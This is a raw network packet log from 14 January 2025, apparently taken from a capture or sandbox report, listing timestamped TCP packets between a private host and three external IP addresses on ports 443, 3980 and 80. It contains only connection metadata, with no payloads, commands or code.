                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.318170071 CET44349765109.99.162.14192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.318344116 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.318344116 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.318368912 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.318440914 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.319020987 CET44349765109.99.162.14192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.319189072 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.319189072 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.319221973 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.319221973 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.319221973 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.319684982 CET44349765109.99.162.14192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.319839001 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.319839001 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.319863081 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.319863081 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.319926977 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.514240026 CET44349765109.99.162.14192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.514502048 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.514827967 CET44349765109.99.162.14192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.515037060 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.515156031 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.515420914 CET44349765109.99.162.14192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.515661001 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.515661001 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.516100883 CET44349765109.99.162.14192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.516308069 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.516349077 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.516767979 CET44349765109.99.162.14192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.516976118 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.516976118 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.517018080 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.517515898 CET44349765109.99.162.14192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.517784119 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.517822981 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.518192053 CET44349765109.99.162.14192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.518378019 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.518378019 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.518378019 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.518460989 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.518461943 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.519026995 CET44349765109.99.162.14192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.519208908 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.519208908 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.519253016 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.519694090 CET44349765109.99.162.14192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.519874096 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.519874096 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.519918919 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.519918919 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.520432949 CET44349765109.99.162.14192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.520616055 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.520617008 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.520659924 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.520659924 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.520742893 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.521218061 CET44349765109.99.162.14192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.521492958 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.521907091 CET44349765109.99.162.14192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.522115946 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.522115946 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.522169113 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.522614956 CET44349765109.99.162.14192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.522814989 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.522814989 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.522857904 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.523128033 CET44349765109.99.162.14192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.523332119 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.523332119 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.523381948 CET44349765109.99.162.14192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.523468018 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:27.523559093 CET49765443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:33.866242886 CET497673980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:34.411138058 CET39804976743.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:34.411485910 CET497673980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:34.412581921 CET497673980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:34.965588093 CET39804976743.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:34.967513084 CET497673980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:35.511790037 CET39804976743.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:35.513629913 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:35.554295063 CET497673980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:35.621896029 CET4976980192.168.11.20178.237.33.50
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:35.803940058 CET8049769178.237.33.50192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:35.804280996 CET4976980192.168.11.20178.237.33.50
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:35.804280996 CET4976980192.168.11.20178.237.33.50
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:35.990336895 CET8049769178.237.33.50192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:35.990655899 CET4976980192.168.11.20178.237.33.50
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:36.034723043 CET497673980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:36.059215069 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:36.059525967 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:36.059770107 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:36.621186972 CET39804976743.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:36.636605024 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:36.636621952 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:36.636632919 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:36.636643887 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:36.636655092 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:36.636814117 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:36.636929989 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:36.636945963 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:36.637052059 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:36.637093067 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:36.637151957 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:36.637258053 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:36.637273073 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:36.637501955 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:36.990147114 CET8049769178.237.33.50192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:36.990345955 CET4976980192.168.11.20178.237.33.50
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.182626963 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.182661057 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.182684898 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.182707071 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.182846069 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.182859898 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.182897091 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.182974100 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.183052063 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.183140993 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.183291912 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.183427095 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.183429956 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.183459044 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.183531046 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.183602095 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.183682919 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.183712959 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.183883905 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.183957100 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.183994055 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.184036016 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.184164047 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.184180975 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.184262037 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.184334040 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.184376955 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.184504032 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.184515953 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.184834003 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.728704929 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.728769064 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.728812933 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.728857040 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.728898048 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.728951931 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.729001999 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.729032993 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.729161978 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.729218006 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.729245901 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.729368925 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.729562044 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.729576111 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.729635000 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.729680061 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.729825020 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.729871988 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.729897976 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.729897976 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.730076075 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.730168104 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.730254889 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.730302095 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.730344057 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.730407000 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.730495930 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.730576992 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.730583906 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.730750084 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.730748892 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.730874062 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.730921030 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.731034040 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.731091022 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.731245041 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.731256008 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.731303930 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.731416941 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.731502056 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.731576920 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.731641054 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.731729031 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.731746912 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.731868029 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.731915951 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.731967926 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.732088089 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.732196093 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.732260942 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.732311964 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.732429028 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.732435942 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.732564926 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.732599974 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.732670069 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.732786894 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.732898951 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.732937098 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:37.733109951 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.273941994 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.273957968 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.274173021 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.274231911 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.274246931 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.274384022 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.274508953 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.274522066 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.274604082 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.274776936 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.274827957 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.274837971 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.274961948 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.275074959 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.275103092 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.275190115 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.275232077 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.275276899 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.275405884 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.275444984 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.275593042 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.275670052 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.275751114 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.275780916 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.275821924 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.275914907 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.275938034 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.276087046 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.276091099 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.276200056 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.276252985 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.276289940 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.276411057 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.276529074 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.276591063 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.276648998 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.276760101 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.276788950 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.276885033 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.276926994 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.277036905 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.277116060 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.277228117 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.277266979 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.277378082 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.277440071 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.277467012 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.277578115 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.277694941 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.277781010 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.277811050 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.277930975 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.277945995 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.278095007 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.278105974 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.278211117 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.278328896 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.278438091 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.278439999 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.278563023 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.278609991 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.278666019 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.278832912 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.278904915 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.278953075 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.279022932 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.279120922 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.279154062 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.279267073 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.279290915 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.279428005 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.279521942 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.279609919 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.279627085 CET497683980192.168.11.2043.226.229.209
